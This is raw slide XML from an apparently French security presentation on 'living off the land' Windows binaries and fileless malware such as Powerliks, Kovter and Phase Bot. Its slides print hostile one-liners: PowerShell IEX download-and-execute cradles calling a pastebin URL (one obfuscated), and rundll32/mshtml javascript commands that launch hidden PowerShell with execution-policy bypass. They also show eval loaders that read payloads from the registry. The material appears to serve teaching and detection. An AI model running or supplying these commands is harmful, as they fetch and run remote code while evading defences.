                </a:solidFill>
                <a:latin typeface="Garamond" panose="02020404030301010803"/>
              </a:rPr>
              <a:t>BITSADMIN</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR"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7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4591555" y="2816906"/>
            <a:ext cx="2666074" cy="92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FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Garamond" panose="02020404030301010803"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>CERTUTIL</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR"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8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1211179" y="4736824"/>
            <a:ext cx="2606441" cy="923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Garamond" panose="02020404030301010803"/>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FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Garamond" panose="02020404030301010803"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>RUNDLL32</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Garamond" panose="02020404030301010803"/>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9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4645187" y="4736824"/>
            <a:ext cx="2558811" cy="923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FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Garamond" panose="02020404030301010803"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>REGSRV32</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR"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9" name="Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7924302" y="2816906"/>
            <a:ext cx="2666074" cy="92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srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Garamond" panose="02020404030301010803"/>
              </a:rPr>
              <a:t>MSHTA</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR"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20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8032648" y="4736824"/>
            <a:ext cx="2557728" cy="92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FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Garamond" panose="02020404030301010803"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>WSCRIPT</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR"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543101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smtClean="0"/>
              <a:t>EXAMPLE : CMD.EXE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1632247" y="1820254"/>
            <a:ext cx="847742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Garamond" panose="02020404030301010803"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>				</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" sz="18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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2523626" y="2038156"/>
            <a:ext cx="7144747" cy="2781688"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1487156" y="5546690"/>
            <a:ext cx="5601342" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Ces commandes ne vont pas créer des processus enfant</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1127919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smtClean="0">
                <a:sym typeface="Bodoni SvtyTwo ITC TT-Book"/>
              </a:rPr>
              <a:t>LIVING OFF THE LAND</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585531868"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5559424" y="397620"/>
          <a:ext cx="6175375" cy="525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p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5540090" y="3171782"/>
            <a:ext cx="60829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powershell.exe -</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>nop</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NoProfile</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WindowStyle</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> 1 -c IEX (New-Object Net.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rgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>WebClient</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DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>('https://pastebin.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>raw</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>/4f645CDG') </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5540090" y="4148816"/>
            <a:ext cx="682981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void</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System.Reflection.Assembly</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LoadWithPartialName</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Microsoft.VisualBasic</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF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Microsoft.VisualBasic.Interaction</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CallByName</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>((New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF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D$x$ownloadStr$x$ing</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>'.replace('$x$', ''),[</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Microsoft.VisualBasic.CallType</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF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rgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Method,'https</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>://paste$x$bin.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>raw</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>/4f645CDG'.replace('$x$', '')) | IEX; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5426110" y="5402850"/>
            <a:ext cx="66341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rundll32.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>javascript</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mshtml,RunHTMLApplication</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document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>();r=</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new%20ActiveXObject("</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>WScript.Shell</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run</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powershell</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WindowStyle</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hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF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nologo</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noprofile</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ExecutionPolicy</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> Bypass IEX (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>System.Net</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF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rgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>WebClient</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DownloadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>('https://secure.eicar.org/eicar.com.txt', '..\\eicar.exe')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;&amp;cmd /c </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>notepad</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> ..\\eicar.exe",0,true); </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1526308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smtClean="0">
                <a:sym typeface="Bodoni SvtyTwo ITC TT-Book"/>
              </a:rPr>
              <a:t>POWERLICKS</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3684336521"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5559424" y="397620"/>
          <a:ext cx="6175375" cy="525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p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5375869" y="3297206"/>
            <a:ext cx="673239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rgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>javascript</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mshtml,RunHTMLApplication</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document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>("\74script </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>language</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jscript.encode</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>&gt;"+(new%20ActiveXObject("</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>WScript.Shell</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RegRead</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>("HKCU\\software\\</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>microsoft</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windows</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currentversion</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run</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF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+"\74/script&gt;") </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="593309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smtClean="0">
                <a:sym typeface="Bodoni SvtyTwo ITC TT-Book"/>
              </a:rPr>
              <a:t>KOVTER</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3872928919"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5345723" y="522514"/>
          <a:ext cx="6175375" cy="5216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p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5345723" y="2900234"/>
            <a:ext cx="64633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javascript:d7hcQ4a="vn";n0a=new%20ActiveXObject("</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>WScript.Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>");Rtf7j=</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"HIPc";X18ycI=n0a.RegRead("HKCU\\software\\tN32795\\74gjfzcsfI");</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jM5IV6m="QJ";</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>(X18ycI);XIaL0uze="lYuLz1vG" </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5647173" y="1106410"/>
            <a:ext cx="1236429" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RegEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3066135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smtClean="0">
                <a:sym typeface="Bodoni SvtyTwo ITC TT-Book"/>
              </a:rPr>
              <a:t>PHASE BOT</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3872928919"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5345723" y="522514"/>
          <a:ext cx="6175375" cy="5216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647173" y="1106410"/>
            <a:ext cx="1236429" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RegEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5426110" y="3460654"/>
            <a:ext cx="68771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rgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>javascript</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mshtml,RunHTMLApplication</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eval</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>((new%20ActiveXObject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WScript.Shell</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RegRead</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>(“HKCUSoftwareMicrosoftActive%20SetupInstalled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%20Components{72507C54-3577-4830-815B-310007F6135A}JavaScript”));close(); </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
